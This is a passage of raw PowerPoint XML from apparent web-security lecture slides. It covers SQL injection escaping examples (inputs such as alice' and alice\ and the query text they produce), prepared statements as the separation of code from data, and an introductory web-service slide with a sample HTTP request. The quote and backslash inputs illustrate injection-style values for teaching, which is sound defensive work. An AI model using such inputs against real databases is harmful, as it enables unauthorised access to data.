                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\’;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, syntax error, quote not closed                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[…] WHERE Username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\’’;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[…] WHERE Username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\’;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354464408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6BE9C4-0365-594D-ADFC-BF11D0C27ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Prepared Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91C3D1D-B32A-6441-8EB7-630B0CD015DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Fundamental cause of SQL injection:    mixing data and code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Fundamental solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:                       separate data and code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420973160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6BE9C4-0365-594D-ADFC-BF11D0C27ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Prepared Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91C3D1D-B32A-6441-8EB7-630B0CD015DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepared statement:                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user sends an SQL statement template to the database, with parameters left unspecified;                                     database parses, compiles and performs query optimization on the SQL statement template and stores the result without executing it;               database later binds data to the prepared statement;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309042952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93617A-D55D-1044-92E7-3022A4759A63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Prepared Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B74CCD7-6721-8C41-A230-86D8C7590653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted code is sent via a code channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Untrusted user-provided data is sent via data channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database clearly knows the boundary between code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data received from the data channel is not parsed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can hide code in data, but the code will never be treated as code, so it will never be attacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18010785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ACC276-41B3-D94A-A221-1D642D558EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Web Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A78882E-4961-3D43-842A-B245A7D7BC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A platform for deploying applications and sharing information, portably and securely, using HTTP/HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78CD938C-06EB-704E-84B1-4BAD64BD531B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3716020"/>
            <a:ext cx="3487735" cy="2862261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA6D9DC-1C6D-E144-BFD0-CD472935ED0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147637" y="3711257"/>
            <a:ext cx="3497579" cy="2872105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3497579" h="2872104">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3497260" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3497260" y="2871786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2871786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA971AB-0A6D-B04C-8EAF-256EDB50B03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366000" y="3351600"/>
            <a:ext cx="1549400" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-90" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657B2EDB-7B4B-504C-B558-26067254F027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850961" y="4883156"/>
            <a:ext cx="3577263" cy="143862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88B73AF-B676-174D-AB2F-7B9CA2BF1D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3910011" y="4919205"/>
            <a:ext cx="3328670" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3328670" h="25400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3328594" y="24789"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38099">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B76102-D869-0845-AAD0-C65011FCFD9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176391" y="4881781"/>
            <a:ext cx="156135" cy="123790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E8AF6C1-2765-BD47-9E2B-809482FA6BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850960" y="5555378"/>
            <a:ext cx="3577264" cy="147691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD08F499-E338-504C-80CD-386DD99B0943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4040577" y="5592544"/>
            <a:ext cx="3328670" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3328670" h="28575">
                <a:moveTo>
                  <a:pt x="3328596" y="28475"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38099">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA03179A-D65E-1348-904C-F12B51AF8DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3946657" y="5531015"/>
            <a:ext cx="156182" cy="123790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6465A280-220E-8748-8D29-1E50178766FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669245" y="3352800"/>
            <a:ext cx="2159000" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CLIENT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-90" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>BROWSER</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5378C879-5C9F-DD41-ADBB-B0371C698EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237827" y="4048267"/>
            <a:ext cx="2799080" cy="763270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="44450" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>REQUEST:</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="1950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET /account.html HTTP/1.1  Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.safebank.com</a:t>
            </a:r>
